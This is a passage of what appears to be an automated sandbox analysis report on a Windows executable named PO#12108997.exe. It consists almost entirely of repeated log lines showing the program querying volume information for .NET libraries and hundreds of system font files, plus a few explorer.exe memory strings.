Source: explorer.exe, 00000005.00000000.291781655.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273520311.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Users\user\Desktop\PO#12108997.exe VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
